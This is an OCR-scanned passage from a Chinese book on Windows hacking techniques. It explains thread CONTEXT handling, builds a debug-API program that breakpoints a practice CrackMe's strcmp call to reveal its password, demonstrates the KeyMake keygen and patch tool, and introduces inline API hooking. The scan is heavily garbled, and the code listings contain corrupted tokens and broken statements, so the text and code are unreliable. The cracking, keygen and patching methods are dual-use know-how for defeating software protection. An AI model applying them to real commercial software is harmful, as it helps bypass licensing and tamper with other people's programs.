// 该 框架 可 作为 NtContinue 的 参数 ， 用 于 构建 APC 交付 的 调用 框架 ， 用 在 用 户 线 别 的 线程 创建 例 程 中 
. vg 
// The layout of the record conforms to a standard call frame. 
ph 
GE 
typedef struct _CONTEXT 1 
Vy 
// 该 标记 中 的 值 控 制 CONTEXT 记录 的 内 容 
4 
aA i 那么 对 于 设置 了 值 的 标记 控制 的 上 下 文 记录 的 每 一 部 分 , 假定 上 下 文 记录 
// 包含 有 效 的 上 
ek 
// 如 果 使 用 上 下 文 记录 修改 IN OUT 参数 ， 以 捕获 线程 的 上 下 文 ， 那 么 只 返回 对 应 于 设置 标记 的 上 下 文中 的 
// 线程 部 分 
ef 
// 上 下 文 记录 从 未 用 作 0UT 参数 
pa 


DWORD ContextFlags; 


A 
// 如 果 CONTEXT_DEBUG_ REGISTERS 在 ContextFlags 中 设置 ， 返回 该 部 分 ,注意 ， 
// CONTEXT_DEBUG. REGISTERS 不 包含 在 CONTEXT_FULE 中 


bon 

DWORD DrO0; 

DWORD DE 

DWORD Dr2; 

DWORD Dr3; 

DWORD Dr6; 

DWORD Deys 

Vi | 

// 如 果 ContextFlags 字 包含 标记 CONTEXT_FLOATING_POINT， 就 返回 该 部 分 
7 


FLOATING SAVE AREA FloatSave; 


A 
// 如 果 ContextFlags 字 包 含 标记 CONTEXT_SEGMENTS， 就 返回 该 部 分 
yk 


DWORD SegGs; 
DWORD SegFs; 
DWORD SedgEsr 
DWORD SegDs; 


// 
// 如 果 contextElags 字 包 售 CONTEXT INTEGER 标记 ， 就 返回 该 部 分 
// 


DWORD Edi; 
DWORD Esi; 
DWORD 了 bx 
DWORD Edx» 
DWORD Ecx; 
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DWORD- Eax; 


/7 
// 如 果 ContextFlags 字 人 包含 CONTEXT_CONTROL 标记 ， 就 返回 该 部 分 
1 


DWORD Ebp; 

DWORD Eip? 

DWORD SegCs’; // MUST BE SANITIZED 
DWORD EFlags; // MUST BE SANITIZED 
DWORD Esp; 

DWORD Segss’; 


// 

// This section is specified/returned if the ContextFlags word 
// contains the flag CONTEXT EXTENDED REGISTERS. 

// The format and contexts are processor specific 

Ps 


BYTE ExtendedRegisters[MAXIMUM SUPPORTED_ EXTENSION]; 

} CONTEXT; 

这 个 结构 体 看 似 很 大 ， 只 要 了 解 汇编 语言 其 实 也 并 不 大 。 前 面 章节 中 介绍 了 关于 汇编 语 
言 的 知识 ， 对 于 结构 体 中 的 各 个 字段 ， 读 者 应 该 非常 熟悉 。 关 于 各 个 寄存 器 的 介绍 ， 这 里 就 
不 重复 了 ， 这 需要 读者 翻 看 前 面 的 内 容 。 这 里 只 介绍 ContextFlags 字段 的 功能 ， 该 字段 用 于 
控制 GetThreadContext() 和 SetThreadContext() 能 够 获取 或 写 入 的 环境 信息 。ContextFlags 的 取 
值 也 只 能 在 Winnt.h 头 文件 中 找到 ， 其 取 值 如 下 : 


#define CONTEXT CONLTROL (CONTEXT i386 | Ox00000001L) // SS:SP, C8:IP, FLAGS, BP 
#define CONTEXT INTEGER (CONTEXT. 4386, | Oz000000021) / AX, PX, CX DX ST, DI 
#define CONTEXT SEGMENTS (CONTEXT i386 | 0x00000004L) // DS, ES, FS, GS 


#define CONTEXT FLOATING POINT (CONTEXT i386 | Ox00000008L) // 387 state 
#define CONTEXT DEBUG REGISTERS (CONTEXT i386 | 0x00000010L) -// DB 0-3,6,7 
#define CONTEXT EXTENDED REGISTERS (CONTEXT i386|0x00000020L) //cpu specific exten- sions 


#define CONTEXT FULEL (CONTEXT CONTROL | CONTEXT INTEGER |\ 
CONTEXT SEGMENTS) 


#define CONTEXT ALL (CONTEXT CONTROL | CONTEXT ENTEGER | CONTEXT SEGMENTS | CONTEXT_ 
FLOATING POINT | CONTEXT DEBUG REGISTERS | CONTEXT EXTENDED REGISTERS) 


从 这 些 宏 定义 的 注释 能 很 清楚 地 知道 这 些 宏 可 以 控制 GetThreadContext() 和 SetThread 
Context(O 进 行 何 种 操作 。 用 户 在 真正 使 用 时 进行 相应 的 赋值 就 可 以 了 。 


EADy 注 : 关于 CONTEXT 结构 体 可 能 会 在 Winnt.h 头 文件 中 找到 多 个 定义 ， 因 为 该 结构 体 是 与 平台 相关 的 。 
此 ， 在 各 种 不 同 平台 上 ， 此 结构 体 有 所 不 同 。 


线程 环境 在 Windows 中 定义 了 一 个 CONTEXT 的 结构 体 。 要 获取 或 设置 线程 环境 的 话 ， 
需要 使 用 GetThreadContext() 和 SetThreadContext()。 这 两 个 函数 的 定义 如 下 : 


BOOL GetThreadContext( 


HANDLE hrhread, // 线程 句柄 
LPCONTEXT lpContext // 上 下 文 结构 
}? 
BOOL SetThreadContext( 
HANDLE hThread, // 线程 句柄 
CONST CONTEXT *lpContext // 上下文 结构 


) 7 
这 两 个 函数 的 参数 基本 一 样 ，hThread 表示 线程 句柄 ， 而 jpContext 表示 指向 CONTEXT 
的 指针 。 所 不 同 的 是 ，GetThreadContextO 是 用 来 获取 线程 环境 的 ，SetThreadContextO 是 用 来 
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设置 线程 环境 的 。 需 要 注意 的 是 ， 在 获取 或 设置 线程 的 上 下 文 时 ， 请 将 线程 暂停 后 进行 ， 以 
免 发 生 “不明 现 象 ”。 


6.7 打造 一 个 密码 显示 器 


关于 系统 提供 的 调试 API 函数 已 经 学 习 了 不 少 ， 而 且 基 本 上 常用 到 的 函数 都 已 学 过 。 下 
面 用 调试 API 编写 一 个 能 够 显示 密码 的 程序 。 读 者 别 以 为 这 里 写 的 程序 什么 密码 都 能 显示 ， 
这 是 不 可 能 的 。 下 面 针对 前 面 的 CrackMe 来 编写 一 个 显示 密码 的 程序 。 

在 编写 关于 CrackMe 的 密码 显示 程序 以 前 需要 准备 两 项 工作 , 第 一 项 工作 是 知道 要 在 什 
么 地 方 合 理 地 下 断 点 , 第 二 项 工作 是 从 哪里 能 读 取 到 密码 。 带 着 这 两 个 问题 重新 来 思考 一 下 。 
在 这 里 的 程序 中 ， 要 对 两 个 字符 串 进行 比较 ， 而 比较 的 函数 是 stremp()， 该 函数 有 两 个 参数 ， 
分 别 是 输入 的 密码 和 真正 的 密码 。 也 就 是 说 ， 在 调用 stremp() 函 数 的 位 置 下 断 点 ， 通 过 查看 
它 的 参数 是 可 以 获取 到 正确 的 密码 的 。 在 调用 sttcmp0 函 数 的 位 置 设置 INT3 断 点 ， 也 就 是 将 
0xCC 机 器 码 写 入 这 个 地 址 。 用 OD 看 一 下 调用 stremp0O 函 数 的 地 址 ， 如 图 6-75 所 示 。 


FiF OOkB1E9E Easyulrac. BHAIEYE 








图 6-75 调用 stremp() 函 数 的 地 址 


从 图 6-75 中 可 以 看 出 , 调用 strcmpO 函 数 的 地 址 为 00401E9E。 有 了 这 个 地 址 ， 只 要 找到 
该 函数 的 两 个 参数 ， 就 可 以 找到 输入 的 错误 的 密码 及 正确 的 密码 。 从 图 6-75 中 可 以 看 出 ， 正 
确 的 密码 的 起 始 地 址 保存 在 EDX 中 , 错误 的 密码 的 起 始 地 址 保存 在 ECX 中 。 只 要 在 00401E9E 
地 址 处 下 断 点 ， 并 通过 线程 环境 读 取 EDX 和 ECX 寄存 器 值 就 可 以 得 到 两 个 密码 的 起 始 地 址 。 

进行 准备 的 工作 已 经 做 好 了 ， 下 面 来 写 一 个 控制 台 的 程序 。 先 定义 两 个 常量 ， 一 个 是 用 
来 设置 断 点 的 地 址 ， 另 一 个 是 INT3 指令 的 机 器 码 。 定 义 如 下 : 

// 需要 设置 INT3 断 点 的 位 置 

#define BP VA 0x00401E9E 


// INT3 的 机 器 码 
const BYIE Bint3 NECC57 


把 CrackMe 的 文件 路 径 及 文件 名 当 参 数 传递 给 显示 密码 的 程序 。 显示 的 程序 首先 要 以 调 
试 的 方式 创建 CrackMe， 代 码 如 下 : 
/7 启动 信 


STARTUPINFO si = { 0 }; 
si.cb = sizeof (STARTUPINFO); 
GetStartupIlinfo(&si)’; 


// 进程 信息 
PROCESS_INFORMATION pi = { 0 }; 


// 创建 被 调试 进程 
BOOL bRet = CreateProcess (pszFileName, 
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NULI， 

NULL, 

NULL, 

FALSE, 

DEBUG_ PROCESS | DEBUG ONEY THIS_ PROCESS, 
NULE, 

NULL, 

&SIi7 

&PI) 


if ( DRet == FALSE ) 

{ 
printf("CreateProcess Error \r\n");? 
etlrn lg 


} 
然后 进入 调试 循环 , 要 处 理 两 个 调试 事件 , 一 个 是 CREATE_PROCESS_DEBUG EVENT,， 
男 一 个 是 EXCEPTION_DEBUG EVENT 下 的 EXCEPTION_BREAKPOINT。 处 理 CREATE 


PROCESS_DEBUG EVENT 的 代码 如 下 : 
/7 创建 进程 时 的 调试 事件 
Caseé CREATE PROCESS .DEBUG, EVENT: 


{ 

// 读 取 欲 设置 INT3 断 点 处 的 机 器 码 

// 方便 后 面 恢复 

ReadProcessMemory (pi.hPprocess, 
(LPEVOID) BE_VA, 
(LFEVOID) gbOldByte, 
sizeof (BYTE), 
tdwReadWriteNam);? 


/7 将 INT3 的 机 器 码 0xCc 写 入 断 点 处 

WriteProcessMemory (pi.hPprocess, 
(LPVOID) BP_VA, 
(LPVOID) gbInt3, 
sizeof (BYTE) ， 
&dwReadWriteNum); 

break; 

} 


在 CREATE PROCESS_DEBUG EVENT 中 对 调用 strcmp() 函 数 的 地 址 处 设置 INT3 断 
点 ， 再 将 0xCC 写 入 这 里 时 要 把 原来 的 机 器 码 读 取出 来 。 读 取 原 机 器 码 使 用 ReadProcess 
Memory(), 写 入 INT3 的 机 器 码 使 用 WriteProcessMemory0。 读 取 原 机 器 码 的 作用 是 当 写 入 的 
0xCC 产生 中 断 以 后 ， 需 要 将 原 机 器 码 写 回 ， 以 便 程 序 可 以 正确 继续 运行 。 

再 来 看 一 下 EXCEPTION DEBUG EVENT 下 的 EXCEPTION _ BREAKPOINT 是 如 何 进 
行 处 理 的 ， 代 码 如 下 : 


/7 产生 异常 时 的 调试 事件 
case EXCEPTION DEBUG EVENT: 


// 判断 异常 类 型 


switceh ( de.u,.Exception.ExceptionRecord,ExceptionCode ) 


{ 
/7 INT3 类 型 的 异常 
Case EXCEPTION BREAKPOINT: 


{ 
// 获取 线程 环境 
context.ContextFlags = CONTEXT FULL; 
GetThreadContext (pi.hThread, &context); 


// 判断 是 否 断 在 设置 的 断 点 位 置 处 
if ( {BP VA + 1) == context.Eip ) 
{ 
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// 读 取 正确 的 密码 

ReadProcessMemory (pi.hProcess, 
(LPVOID) context .Edx, 
(LPVOID)pszPassword, 
MAXBYTE, 
&dwReadWriteNum); 

// 读 取 错 误 密码 

ReadProcessMemory (pi.hProcess, 
(LEVOID) context .Ecx, 
(LPVOID)pszErrorPpass, 
MAXBYTE, 
&dwReadWriteNum); 
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printf ("你 输入 的 密码 是 : %s \r\n", PszErrorPass) 
printf ("正确 的 密码 是 : %s \r\n", pszPassword); 


// 指 令 执 行 了 INT3 而 被 中 断 

// INT3 的 机 器 指令 长 度 为 1 字 节 
// 因此 需要 将 EIP 减 一 来 修正 EIP 
//_EIP 是 指令 指针 寄存 器 

// 其 中 保存 着 下 条 要 执行 指令 的 地 址 


Context BLD 77 


// 修正 原来 该 地 址 的 机 器 码 
WriteProcessMemory (pi.hProcess, 
(LPVOID) BP_VA, 
(LPVOID) tbOoldByte, 
sizeof (BYTE), 
&dwReadWriteNum); 
// 设置 当前 的 线程 环境 


SetThreadContext (pi.hThread, &context); 


} 
break; 


} 
} 


对 于 调试 事件 的 处 理 ， 应 该 放 到 调试 循环 中 。 上 面 的 代码 给 出 的 是 对 调试 事件 的 处 理 ， 
再 来 看 一 下 调试 循环 的 大 体 代码 : 
while (TRUE ) 
// 获取 调试 事件 
WaitForDebugEbvent (&de, INFINITE); 


| // 判断 事件 类 型 
| switch ( de.dwDebugEventCode ) 


{ 
// 创建 进程 时 的 调试 事件 
case CREATE PROCESS DEBUG_EVENT: 


{ 
break; 


} 
// 产生 异常 时 的 调试 事件 
case EXCEPTION DEBUG EVENT: 


/7 判断 异常 类 型 


switch ( de.u.Exception.ExceptionRecord.ExceptionCode ) 


{ 
// INT3 类 型 的 异常 
Case EXCEPTION BREAKPOINT: 
4 
} 
break; 
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} 


ContinueDebugEvent (de.dwProcesslid,de.dwThreadId, DBG CONTINUE); 


} 

只 要 把 调试 事件 的 处 理 方法 放 入 调试 循环 中 ， 程 序 就 完整 了 。 接 下 来 编译 连接 一 下 ， 然 
后 把 CrackMe 直接 拖 放 到 这 个 密码 显示 程序 上 。 程序 会 启动 CrackMe 进程 ,并 等 待 用 户 的 输 
入 。 输 入 账号 及 密码 后 ， 单 击 “ 确 定 ” 按 钮 ， 程 序 会 显示 出 正确 的 密码 和 用 户 输入 的 密码 ， 
如 图 6-76 所 示 。 





图 6-76 显示 正确 密码 


根据 图 6-76 显示 的 结果 进行 验证 ， 可 见 获 取 的 密码 是 正确 的 。 程 序 到 此 结束 , 读者 可 以 
把 该 程序 改 成 通过 附加 调试 进程 来 显示 密码 ， 以 巩固 所 学 的 知识 。 


6.8 KeyMake 工具 的 使 用 


本 章 介绍 了 PE 结构 和 调试 原理 ， 此 外 还 介绍 了 文件 补丁 和 内 存 补丁 方面 的 知识 。 在 此 
顺便 介绍 一 款 制作 注册 机 的 工具 一 一 KeyMake (《 黑 客 帝国 》 第 二 部 中 的 “关键 人 物 ” 就 是 
KeyMake， 用 来 配 钥匙 的 那个 老头 )。KeyMake 的 界面 如 图 6-77 所 示 。 

KeyMake 的 功能 非常 多 ， 这 里 主要 介绍 “其 他 ”菜单 下 的 功能 ， 如 图 6-78 所 示 。 

2 注册 机 编号 器 
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图 6-77 KeyMake 工具 界面 图 6-78 “其 他 ”菜单 下 的 功能 
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KeyMake 菜单 有 3 个 主要 功能 ， 分 别 是 “内 存 注 册 机 ”“ 制 作文 件 补丁 ”和 “制作 内 存 
补丁 ” 分 别 以 前 面 的 程序 例子 来 制作 3 个 补丁 程序 。 

首先 来 制作 “内 存 注 册 机 ”。 在 KeyMake 的 “其 他 ”菜单 下 选择 “内 存 注册 机 ” 出 现 “ 设 
置 注 册 机 信息 ”界面 ， 如 图 6-79 所 示 。 

在 图 6-79 中 的 “程序 名 称 ” 处 选择 前 面 写 的 CrackMe 程序 ， 然 后 单 击 “ 添 加 ”按钮 ， 
出 现 “ 添 加 数据 ”界面 ， 添 加 相应 的 数据 ， 如 图 6-80 所 示 。 











I 作 前 内 存 注册 机 的 程 订 








el 


aaazm | Mm | CD 
图 6-79 “设置 注册 机 信息 ”界面 图 6-80 “添加 数据 ”界面 




















在 图 6-80 中 ， 首 先 要 添加 中 断 地 址 ， 在 “中 断 地 址 ”处 输入 “00401E9E”， 在 “中 断 次 
数 ” 处 输入 “1”， 在 “第 一 字 节 ”处 输入 “E8”， 在 “指令 长 度 ” 处 输入 “5”。 为 什么 这 么 
填写 呢 ? 对 于 “中 断 地 址 入 “第 一 字 节 ”和 “指令 长 度 ” 的 填写 方法 ， 参 考 图 6-75 就 能 够 明 

白 。“ 中 断 次 数 ” 是 指 在 中 断 地 址 被 断 下 第 几 次 后 去 读 取 数据 。 由 于 正确 “密码 ”在 内 存 中 ， 
因此 在 “保存 下 列 信息 为 注册 码 ” 窗 口中 选择 “内 存 方式 ”选择 “寄存 器 ”为 “EDX”。 这 
里 也 对 照 图 6-75 就 可 以 明白 。 填 写 完 上 面 的 内 容 后 ， 单 击 “ 添 加 ”按钮 则 返回 “设置 注册 机 
信息 ”界面 ， 然 后 单 击 “ 生 成 ”按钮 ， 将“ 内存 注册 机 ” 放 在 与 CrackMe 相同 的 目录 下 即 可 。 
然后 运行 生成 的 注册 机 ， 会 出 现 CrackMe 程序 界面 ， 随 便 输入 一 个 “账号 ”和 “密码 ”， 单 
击 “ 确 定 ” 按 钮 即 可 出 现 正 确 的 注册 码 ， 如 图 6-81 所 示 。 

制作 “文件 补丁 ”相对 于 “内 存 注册 机 ”要 简单 很 多 。 制 作 “ 文 件 补丁 ”的 KeyMake 
界面 如 图 6-82 所 示 。 

在 图 6-82 中 ， 在 “原始 的 文件 ”处 选择 破解 前 的 文件 ， 在 “已 破解 文件 ”处 选择 已 经 破 
解 后 的 文件 ， 然 后 单 击 “制作 ”按钮 即 可 生成 一 个 文件 补丁 程序 。 这 里 需要 说 明 的 是 ， 之 所 
以 选择 “原始 的 文件 ” 是 因为 生成 的 文件 补丁 在 对 没有 破解 的 文件 进行 打 补 丁 前 需要 对 文件 
的 CRC 校 验 和 进行 计算 ， 以 防止 由 于 文件 版 本 的 不 同 而 导致 文件 破坏 。 

最 后 介绍 一 下 “内 存 补丁 ”“ 内 存 补丁 ”的 制作 也 是 比较 容易 的 ， 打 开 “ 内 存 补丁 ”的 
制作 界面 ， 然 后 依照 图 6-83 所 示 进 行 设置 。 














I5 制作 文件 补丁 








六 省 芦 乱 
原 嫁 的 净 件 : racHie\Dabue\EasyCrackiie, exe] 
已 破解 交 件 ;Debug\EasyCracldie_Fatch. sxej | 训 览 双 ) 


制作 也 ) 关闭 公 ) 











图 6-82 “制作 文件 补丁 ”界面 





























生成 (@】 关闭 台 ) 


图 6-83 “制作 内 存 补丁 ”界面 





“制作 内 存 补丁 ”界面 中 的 “添加 数据 ”窗口 中 的 相应 设置 ， 请 参考 图 6-57 进行 设置 。 
本 章 的 程序 中 给 出 了 KeyMake 中 的 “文件 补丁 ”“ 内 存 补丁 ”和 “内 存 注 册 机 ”的 编写 
方式 ， 请 读者 参照 KeyMake 软件 再 次 体会 前 面 的 例子 。 


6.9 总 结 


本 章 介绍 了 PE 结构 的 基础 部 分 、OD 的 使 用 及 调试 API 函数 等 。 相 信 读 者 对 PE 结构 解 
析 、OD 调试 工具 使 用 及 调试 原理 有 了 一 定 的 了 解 。 本 章 还 介绍 了 一 些 基础 的 也 是 非常 必要 





册 汶 灿 时 车 贡 四 滥 


| 













遇 纹 灯 遇 车 山口 疲 


| 


”第 6 章 加 密 与 解密 





的 加 解密 知识 。 读 者 在 以 后 学 习 更 多 相关 知识 后 会 发 现 ， 这 些 基 础 知识 对 学 习 加 解密 知识 是 
非常 重要 的 。 

本 章 最 后 的 部 分 介绍 了 KeyMake 工具 的 使 用 。 通 过 KeyMake 的 具体 实例 ， 读 者 可 以 深 
刻 领 会 本 章 前 面 所 学 知识 的 精 要 之 处 。KeyMake 工具 十 分 强大 ， 如 果 在 接触 前 面 的 知识 前 直 
接 接触 KeyMake 工具 , 会 觉得 它 很 神奇 , 但 是 通过 自己 编写 关于 文件 补丁 、 内 存 补丁 和 内 存 
注册 机 的 实例 代码 后 , 就 会 觉得 KeyMake 工具 的 基础 与 原理 其 实 并 不 复杂 ， 甚至 读者 会 自己 
设计 出 一 个 更 强大 的 KeyMake 工具 。 

本 章 的 知识 除了 可 以 应 用 到 加 密 与 解密 方面 ， 还 可 以 应 用 在 免 杀 、 加 壳 脱 壳 、 反 调试 、 
反 病 毒 等 方面 的 。 希 望 读 者 在 掌握 原理 后 多 动手 实践 。 
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有 一 种 技术 被 称 作 HOOK 技术 ， 有 人 称 它 为 “多 子 ”， 也 有 人 称 它 为 “挂钩 ”技术 。 谈 
到 钧 子 ， 很 容易 让 人 联想 到 在 钩 东西 ， 比 如 鱼 钩 就 用 于 钓鱼 。 编 程 技术 的 钧 子 也 是 在 等 待 捕 
获 系统 中 的 某 个 消息 或 动作 。 在 编程 技术 中 ， 钩 子 技 术 在 DOS 时 代 就 已 经 存在 了 。 在 Windows 
下 ， 钩 子 按照 实现 技术 的 不 同和 挂钩 位 置 的 不 同 ， 其 种 类 也 是 越 来 越 多 ， 但 是 设置 钩子 的 本 
质 却 是 始终 不 变 的 。 

钧 子 到 底 是 做 什么 用 的 呢 ? 钧 子 的 应 用 范围 非常 广泛 ， 比 如 输入 监控 、API 拦截 、 消 息 
捕获 、 改 变 程序 执行 流程 等 方面 。 杀 毒 软件 会 用 HOOK 技术 钩 住 一 些 API 函数 ， 比 如 钩 住 注 
册 表 读 写 函数 ， 从 而 防止 病毒 对 注册 表 进 行 写 入 ; 病毒 使 用 HOOK 技术 有 针对 性 地 捕获 键盘 
的 输入 ， 从 而 记录 用 户 的 密码 ; 文件 加 密 系 统 通 过 HOOK 技术 在 不 改变 用 户 操作 的 情况 下 对 
用 户 的 文件 进行 透明 加 密 。 这 些 都 属于 HOOK 范畴 的 知识 。 本 章 将 针对 HOOK 技术 的 部 分 
应 用 方面 介绍 相关 的 编程 知识 。 


7.1 HOOK 技术 概述 





在 DOS 时 代 进 行 编程 时 ， 操 作 系统 提供 的 编程 接口 不 称 为 API 函数 ， 而 是 称 为 中 断 服 
务 向 量 。 也 就 是 说 ， 当 时 的 操作 系统 提供 的 编程 接口 只 有 中 断 ， 要 进行 写 文 件 就 要 调用 系统 
中 断 ， 要 进行 读 文 件 也 要 调用 系统 中 断 〈 当 然 ， 也 可 以 不 调用 DOS 操作 系统 的 中 断 ， 而 直接 
调用 更 底层 的 中 断 ) :…… 中 断 服务 向 量 类 似 于 Windows 系统 下 的 API 函数 , 在 操作 系统 的 某 
个 地 址 保存 着 。 它 以 数组 的 形式 保存 着 ， 也 称 为 中 断 向 量 表 。DOS 时 代 的 HOOK 技术 也 就 
是 修改 中 断 向 量 表 中 的 中 断 地 址 。 比 如 ， 要 捕获 写 操作 ， 那 么 就 修改 中 断 向 量 表 中 关于 写 文 
件 的 地 址 ， 将 写 文件 的 中 断 地 址 保存 好 ， 然 后 蔡 换 为 自己 函数 的 地 址 ， 这 样 当 程序 调用 写 文 
件 中 断 时 ， 函 数 就 被 执行 了 ， 当 程序 执行 完 以 后 ， 可 以 继续 调用 原来 的 中 断 地 址 ， 从 而 完成 
写 文件 的 操作 。 

在 Windows 系统 下 ，HOOK 技术 的 方法 比较 多 ， 使 用 比较 灵活 ， 常 见 的 HOOK 方法 有 
Inline Hook、IAT Hook、EAT Hook、Windows 钧 子 …*…HOOK 技术 涉及 DLL 相关 的 知识 。 
HOOK 技术 也 涉及 注入 的 知识 , 想 要 把 完成 HOOK 功能 的 DLL 文件 加 载 到 目标 进程 空间 中 ， 
就 要 使 用 注入 的 知识 。 

下 面 来 介绍 常用 的 Windows 系统 下 的 HOOK 技术 。 
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7.2.1 Inline Hook 的 原理 


API 函数 都 保存 在 操作 系统 提供 的 DLL 文件 中 。 当 在 程序 中 调用 某 个 API 函数 并 运行 程 
序 后 ， 程 序 会 隐 式 地 将 API 函数 所 在 的 DLL 文件 加 载 入 进程 中 。 这 样 ， 程 序 就 会 像 调 用 自 
己 的 函数 一 样 调用 API， 大 体 过 程 如 图 7-1 所 示 。 

从 图 7-1 中 可 以 看 出 , 在 进程 中 , 当 EXE 模块 调用 CreateFile0) 函 数 的 时 候 , 会 调用 kernel32.dll 
模块 中 的 CreateFile() 函 数 ， 因 为 真正 的 CreateFile0) 函 数 的 实现 在 kernel32.dll 模块 中 。 

CreateFile() 是 API 函数 ，API 函数 也 是 由 人 编写 的 代码 再 编译 而 成 的 ， 也 有 其 对 应 的 二 
me 进 制 | 代码。 既然 是 代码 ， 就 可 以 被 修改 。 通 过 一 种 “野蛮 ”的 方法 直接 修改 API 函数 在 内 存 
中 的 映像 ， 从 而 对 API 函数 进行 HOOK。 使 用 的 方法 是 ， 直 接 使 用 汇编 指令 的 jmp 指令 将 其 
代码 执行 流程 改变 ， 进 而 执行 自己 的 代码 ， 这 样 就 使 原来 的 函数 的 流程 改变 了 。 执 行 完 自己 
的 流程 以 后 ， 可 以 选择 性 地 执行 原来 的 函数 ， 也 可 以 不 继续 执行 原来 的 函数 。 

假设 要 对 某 进 程 的 kernel32.dll 的 CreateFile(0) 函 数 进行 HOOK， 首 先 需要 在 指定 进程 中 
的 内 存 中 找到 CreateFile0 函 数 的 地 址 ， 然 后 修改 CreateFile() 函 数 的 首 地 址 的 代码 为 jmp 
MyProc 的 指令 。 这 样 ， 当 指定 的 进程 调用 CreateFile(0) 函 数 时 ， 就 会 首先 跳 转 到 自己 的 函数 
中 去 执行 流程 ， 这 样 就 完成 了 HOOK 的 工作 。 它 的 流程 图 如 图 7-2 所 示 。 


用 GreateFile() 


冻 洲 MOOH 副 折 巴 咬 湘 ” 超 ~ 泊 


EXE 空 间 


调用 GreateFile() i 


DLL 空 间 


Teate ss | 其 他 DLL 
= We Es 


图 7-1 调用 API 函数 的 大 体 过 程 图 7-2 Inline Hook 的 流程 示意 图 





由 于 这 种 方法 是 在 程序 流程 中 直接 进行 嵌入 jmp 指令 来 改变 流程 的 ， 所 以 就 把 它 叫 作 


Inline Hook。 





MN,. 
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7.2.2 Inline Hook 的 实现 


了 解 大 体 的 Inline Hook 流程 后 ， 现 在 来 学 习 它 的 具体 实现 。 

C 语言 程序 被 编译 连接 后 为 一 个 二 进 制 文件 。 在 二 进 制 文件 中 ， 代 码 部 分 都 是 CPU 可 以 
用 来 执行 的 机 器 码 ， 机 器 码 和 汇编 指令 又 是 一 一 对 应 的 。 前 面 讲 过 ，Inline Hook 是 在 程序 中 
拒 入 jmp 汇编 指令 后 跳 转 到 流程 处 继续 执行 的 ，jmp 指令 的 用 法 是 jmp 目的 地 址 。jmp 在 汇 
编 语言 中 是 一 个 无 条 件 的 跳 转 指令 。 在 汇编 指令 中 ，jmp 后 面 跟随 的 参数 是 要 跳 转 的 “目的 
地 址 ” 用 OD 随便 打开 一 个 程序 , 并 且 修 改 它 的 某 条 指令 为 jmp 指令 。 跳 转 的 目的 为 一 个 任 
意 地 址 ， 如 图 7-3 和 图 7-4 所 示 。 








55 |push ebp 
- 8BEC | mou ebp, esp 
2263|| - 6 FF | Push 二 汪 


xD2265|| - 68 98544188 | push 884152398 
-~ 68 C8244088 | Push 《jmp -gHSUCRTD -_except_handler3 
26F | 6391 989996t mou eax， dword ptr fs:[8] 


图 7-3 准备 修改 00402260 地 址 处 的 反 汇 编 代码 为 jmp 指令 

















- ES 1334F411 | jmp 12345678 


Bosg2255|| . 68 2928584199 |push B8415498 


G048226A | . 68 C8244688 | push <jmp.&HSUCRTD. except_handler3> 





图 7-4 ”修改 后 的 有 反 汇编 代码 


从 图 7-3 和 图 7-4 的 对 比 可 以 看 出 ，jmp 指令 占用 了 5 字 节 。 原 来 从 00402260 到 00402265 
处 的 机 器 码 为 55 8B EC 6AFF， 当 修改 图 7-3 中 前 3 句 反 汇编 代码 为 jmp 12345678 后 ， 现 在 
的 机 器 码 为 E9 13 34 F4 11。 其实 ,jmp 对 应 的 机 器 码 是 E9 (针对 长 转移 来 说 ), 后 面 的 13 34 
F4 11 不 是 一 个 具体 的 地 址 ， 而 是 一 个 偏 移 量 。 这 个 偏 移 量 是 多 少 呢 ? 这 个 偏 移 量 是 11F43413， 
请 回忆 一 下 前 面 提 到 过 的 字 节 顺序 的 问题 。 

思考 : 为 什么 在 转移 后 会 使 用 偏 移 量 而 不 是 使 用 有 具体 的 地 址 呢 ? 

写 汇编 代码 时 ，jmp 后 面 往往 是 一 个 要 跳 转 目的 的 “标号 ” 而 并 非 一 个 确切 的 地 址 。 即 
使 源 代码 在 编译 连接 后 也 无 法 得 到 跳 转 的 目的 地 址 。 想 想 DLL 文件 的 加 载 方式 ，DLL 每 次 
装载 的 位 置 并 不 固定 , 因此 jmp 后 面 无 法 给 出 具体 跳 转 的 地 址 。 而 jmp 使 用 一 个 偏 移 量 的 话 ， 
无 论 DLL 每 次 加 载 到 哪个 位 置 ，jmp 都 会 因为 代码 中 的 相对 位 置 固定 而 不 会 跳 转 出 错 。 由 于 
DLL 每 次 装载 的 地 址 不 同 ，DLL 中 部 分 数据 需要 进行 重 定位 以 修正 其 地 址 。 而 为 什么 jmp 
不 能 这 么 做 呢 ? 笔者 觉得 其 实 是 可 以 的 ， 只 是 重 定位 也 需要 时 间 开 销 。 一 个 程序 中 有 大 量 的 
jmp 指令 ( 想 想 前 面 章 节 介 绍 的 反 汇 编 内 容 , 无 论 是 计 for 还 是 while, 都 会 变 成 jcc 的 指令 )， 
那么 由 于 重 定位 ， 每 个 jmp 后 的 地 址 要 浪费 多 长 时 间 ? 使 用 偏 移 量 的 话 就 不 一 样 了 ， 即 使 装 
载 的 地 址 不 同 ， 也 无 须 对 jmp 后 的 地 址 进行 重 定 位 。(jmp 指令 出 现在 DLL 文件 之 前 ， 这 里 
使 用 DLL 文件 来 这 样 介 绍 ， 完 全 是 考虑 到 方便 理解 。) 

jmp 指令 后 的 偏 移 量 计算 公式 如 下 ; 

jmp 后 的 偏 移 量 = 目 标 地 址 一 原 地 址 一 5 

这 是 一 个 非常 重要 的 公式 ， 当 然 对 于 其 使 用 只 要 记 住 就 可 以 了 。 这 里 的 5 是 jmp 的 指令 
长 度 ， 也 就 是 说 ，jmp XXXXxxXxxX 指 令 的 机 器 码 长 度 为 5 字 节 。 验 证 一 下 这 个 公式 ， 目 








半 洲 MOOH 下 川 到 只 酒 出 业 上 四 | 
se 


I 





申 








守 洲 MOOH 事 州 巴 唤 湘 山 忆 小 


| 


第 7 章 黑客 高 手 的 HOOK 技术 





标 地 址 是 12345678， 原 地 址 为 00402260，12345678 一 00402260 一 5 = 11F43413。 用 计算 器 进 
行 计算 ， 如 图 7-5 所 示 。 





a Cm ee | 





或 近 转 移 时 ,如 果 按 照 5 字 节 进行 计算 就 会 出 错 ， 因此 准确 的 描述 应 该 是 “jmp 后 的 偏 移 量 = 目标 地 址 - 
原 地 址 - jcc 的 指令 长 度 "。 最 后 减 去 的 指令 长 度 应 该 根据 具体 的 情况 而 定 。 在 Inline Hook 中 ， 由 于 确定 
jmp 指令 的 长 度 为 5 字 节 ， 因 此 在 这 里 是 可 行 的 。 


上 面 地 址 都 是 用 十 六 进 制 进行 计算 的 ， 读 者 计算 时 要 注意 这 一 点 ， 以 免 计 算 错误 。 通 过 


